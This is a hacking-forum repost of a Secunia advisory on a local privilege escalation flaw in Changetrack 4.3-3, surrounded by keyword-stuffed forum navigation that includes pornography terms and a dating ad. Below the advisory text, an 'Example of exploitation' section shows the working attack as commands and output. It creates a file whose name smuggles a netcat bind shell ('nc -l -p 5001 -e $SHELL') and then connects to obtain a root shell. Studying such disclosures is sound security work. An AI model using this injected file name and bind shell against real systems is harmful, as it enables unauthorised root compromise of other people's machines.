Hack Forums,Cryptography, Encryption, and DecryTV Online,Dolce Sport Live,GSP SI DIGI SPORT ONLINE,FileList si Openetwork,Yahoo Invisible Check,Hack,windows,linux,games,cs,arhiva,psybnc,mirc,scan,ssh,free porn movie,xxx,sex,Digi keyMatrimoniale,Wantedsoft
Welcome to www.team3d.3xforum.ro GSP SI DIGI SPORT ONLINE,FileList si Openetwork,Yahoo Invisible Check,Hack,windows,linux,games,cs,arhiva,psybnc,mirc,scan,ssh 		Lista Forumurilor Pe Tematici
Hack Forums,Cryptography, Encryption, and DecryTV Online,Dolce Sport Live,GSP SI DIGI SPORT ONLINE,FileList si Openetwork,Yahoo Invisible Check,Hack,windows,linux,games,cs,arhiva,psybnc,mirc,scan,ssh,free porn movie,xxx,sex,Digi keyMatrimoniale,Wantedsoft | Reguli | Inregistrare | Login

POZE HACK FORUMS,CRYPTOGRAPHY, ENCRYPTION, AND DECRYTV ONLINE,DOLCE SPORT LIVE,GSP SI DIGI SPORT ONLINE,FILELIST SI OPENETWORK,YAHOO INVISIBLE CHECK,HACK,WINDOWS,LINUX,GAMES,CS,ARHIVA,PSYBNC,MIRC,SCAN,SSH,FREE PORN MOVIE,XXX,SEX,DIGI KEYMATRIMONIALE,WANTEDSOFT

Nu sunteti logat. 		Nou pe simpatie:
Sophya
Femeie
25 ani
Bucuresti
cauta Barbat
25 - 54 ani
Hack Forums,Cryptography, Encryption, and DecryTV Online,Dolce Sport Live,GSP SI DIGI SPORT ONLINE,FileList si Openetwork,Yahoo Invisible Check,Hack,windows,linux,games,cs,arhiva,psybnc,mirc,scan,ssh,free porn movie,xxx,sex,Digi keyMatrimoniale,Wantedsoft / Exploits,vulnerabilities,videos,shellcode / Changetrack 4.3-3 Local Privilege Escalation Vulnerability Moderat de Anonymus
Autor
Mesaj Pagini: 1
[ESP][D][M][X]Team**3D**
Administrator

Inregistrat: acum 18 ani
Postari: 78239
TITLE:
Changetrack Privilege Escalation Vulnerability

SECUNIA ADVISORY ID:
SA36756

VERIFY ADVISORY:

DESCRIPTION:
A vulnerability has been discovered in Changetrack, which can be
exploited by malicious, local users to gain escalated privileges.

The application does not properly escape certain file names, which
can be exploited to inject and execute arbitrary shell commands
(potentially with "root" privileges) by creating a maliciously named
file in a directory tracked by Changetrack.

Successful exploitation requires write privileges to a directory
scanned by Changetrack.

SOLUTION:
Use Changetrack to track trusted directories only.

PROVIDED AND/OR DISCOVERED BY:
Marek Grzybowski


--------------------------------------------------------------------------------
Example of exploitation:

------------ Attacker ----------

:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
:~/testt$ ls
<`nc -l -p 5001 -e $SHELL`

--------------------------------


------------ root --------------

testmachine:~# changetrack

------------ root --------------



------------ Attacker ----------

:~/testt$ nc 127.0.0.1 5001
id
uid=0(root) gid=0(root) groups=0(root)

--------------------------------
pus acum 16 ani
   
Pagini: 1  

Mergi la